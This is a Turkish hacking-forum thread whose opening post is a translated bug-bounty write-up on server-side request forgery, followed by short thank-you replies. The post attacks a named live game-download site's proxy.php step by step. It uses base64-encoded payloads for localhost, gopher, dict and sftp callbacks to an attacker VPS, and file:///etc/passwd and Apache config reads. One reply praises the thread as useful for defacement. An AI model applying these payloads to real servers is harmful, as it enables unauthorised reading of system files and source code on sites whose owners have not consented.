THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

chat
Seçenekler

Sunucu Taraflı İstek Sahteciliği (SSRF) Testi / R4V3N

R4V3N - ait Kullanıcı Resmi (Avatar)
Çevirmen
Üyelik tarihi:
07/2016
Nereden:
Cræzy
Yaş:
22
Mesajlar:
6.181
Konular:
352
Teşekkür (Etti):
817
Teşekkür (Aldı):
2345
Ticaret:
(0) %
29-08-2018 21:39
#1
Post
Sunucu Taraflı İstek Sahteciliği (SSRF) Testi / R4V3N


Bu makale Moderasyon Çeviri Ekibi tarafından çevrilmiştir. Orijinal içeriğe https://medium.com/bugbountywriteup/...g-b9dfe57cca35 adresinden ulaşabilirsiniz.


Bu testi SSRF'ne açığı olan rastgele bir sitede gerçekleştireceğiz lakin exploitlemek için girdimizi base64'e çevirmemiz lazım. Site:

Kod:
http://playfreedownloadgames.com:2483/proxy.php?url=aHR0cDovL3d3dy50b3A4MHNnYW1lcy5jb20vc2l0ZS9jb250ZW50L3BhY21hbg==


Eğer bu base64 kodunu çözersek şu pacman oyun sitesini elde ederiz:

Kod:
http://www.top80sgames.com/site/content/pacman




Kod:
http://127.0.0.1:80


Bunu base64'e dönüştürelim

Kod:
aHR0cDovLzEyNy4wLjAuMTo4MA==


ve Burp Repeater'da çalıştıralım:



Şimdi de 443 portu ile deneyelim ve nasıl göründüğüne bakalım:



"Bad Request" dedi yani kötü istek hatası aldık. Çünkü HTTP istedik ama 443 portu kullandık. Bir de Gopher, DICT ve SFTP deneyelim. VPS'mizde 1337 portunda dinleyeceğiz.



Kod:
gopher://my_vps_ip:1337/_pacenoge


Kod:
dict://my_vps_ip:1337


ve

Kod:
sftp://my_vps_ip:1337


denedik. Sırada ne mi var? Bir de

Kod:
file:///etc/passwd


deneyelim.



Kod:
httpd.conf.


görmek istiyoruz. Varsayılan yolu:

Kod:
/etc/httpd/conf/httpd.conf




Kod:
httpd.conf


dosyasını okuyarak, web yolunun

Kod:
/home/playfreedownloadgames/public_html


olduğunu biliyoruz. Şimdi ise

Kod:
proxy.php


kodunu, şuraya

Kod:
/home/playfreedownloadgames/public_html/proxy.php


erişim sağlayarak bilmek istiyoruz.

---------------------
You only live once, don't let it go to waste
Telegram
Twitter

muhammedse02 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2017
Nereden:
Hızır(a.s)
Mesajlar:
1.034
Konular:
202
Teşekkür (Etti):
95
Teşekkür (Aldı):
150
Ticaret:
(0) %
BeyazAlfa - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2018
Mesajlar:
597
Konular:
34
Teşekkür (Etti):
110
Teşekkür (Aldı):
126
Ticaret:
(0) %
29-08-2018 21:44
#3
Elinize sağlık hocam
---------------------
| TÜRK Irkı Sağolsun! |
| TÜRK Yurdu Var Olsun! |
| Hainleri Kahretsin! |
| Tanrı TÜRK'ü Korusun! |
deli siber - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
12/2017
Nereden:
Virüs Total
Mesajlar:
853
Konular:
54
Teşekkür (Etti):
72
Teşekkür (Aldı):
167
Ticaret:
(0) %
29-08-2018 21:49
#4
Elerine Sağlık hocam
---------------------
▂▃▅▆▇██ ☾✯☾✯☾✯ DELİ SİBER ☾✯☾✯☾✯ ██▇▆▅▃▂▂

███▓ ☾✯ ▓███___________BEN VAZGEÇTİM SIRA SİZDE_________███▓ ☾✯ ▓███


███▓ ☾✯ ▓███ NE MUTLU TÜRKÜM DİYENE ███▓ ☾✯ ▓███

R4V3N - ait Kullanıcı Resmi (Avatar)
Çevirmen
Üyelik tarihi:
07/2016
Nereden:
Cræzy
Yaş:
22
Mesajlar:
6.181
Konular:
352
Teşekkür (Etti):
817
Teşekkür (Aldı):
2345
Ticaret:
(0) %
29-08-2018 23:22
#5
Alıntı:
muhammedse02´isimli üyeden Alıntı Mesajı göster
Güzel konu eline sağlık üstad
Alıntı:
BeyazAlfa´isimli üyeden Alıntı Mesajı göster
Elinize sağlık hocam
Alıntı:
deli siber´isimli üyeden Alıntı Mesajı göster
Elerine Sağlık hocam
Eyvallah
---------------------
You only live once, don't let it go to waste
Telegram
Twitter

'Flash - ait Kullanıcı Resmi (Avatar)
Researcher
Üyelik tarihi:
07/2017
Nereden:
røøt@:~#
Mesajlar:
816
Konular:
30
Teşekkür (Etti):
1254
Teşekkür (Aldı):
218
Ticaret:
(0) %
29-08-2018 23:27
#6
Ellerinize sağlık komutanım.
---------------------
Elbet bir gün.
oldnco - ait Kullanıcı Resmi (Avatar)
Yardımsever
Üyelik tarihi:
09/2017
Yaş:
30
Mesajlar:
1.531
Konular:
43
Teşekkür (Etti):
656
Teşekkür (Aldı):
368
Ticaret:
(0) %
30-08-2018 00:10
#7
Elinize emeğinize sağlık komutanım
--------------------- 💫 Alles wird sehr schön werden
theokeleS - ait Kullanıcı Resmi (Avatar)
E-Mail onayı yapılmamış üye
Üyelik tarihi:
05/2018
Mesajlar:
1.358
Konular:
31
Teşekkür (Etti):
68
Teşekkür (Aldı):
354
Ticaret:
(0) %
30-08-2018 00:11
#8
Elinize sağlık hocam
'TÜRKÇÜ - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2017
Mesajlar:
2.064
Konular:
278
Teşekkür (Etti):
981
Teşekkür (Aldı):
497
Ticaret:
(0) %
30-08-2018 00:14
#9
Deface ve güvenlik anlamında sistemi daha iyi anlamak isteyenler için güzel bir konu olmuş komutanım. Emeğinize sağlık.
Slyfer - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2016
Nereden:
Unknown
Mesajlar:
1.615
Konular:
38
Teşekkür (Etti):
19
Teşekkür (Aldı):
170
Ticaret:
(0) %
30-08-2018 00:30
#10
Elinize sağlık
---------------------

i want to sleep f o r e v e r

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler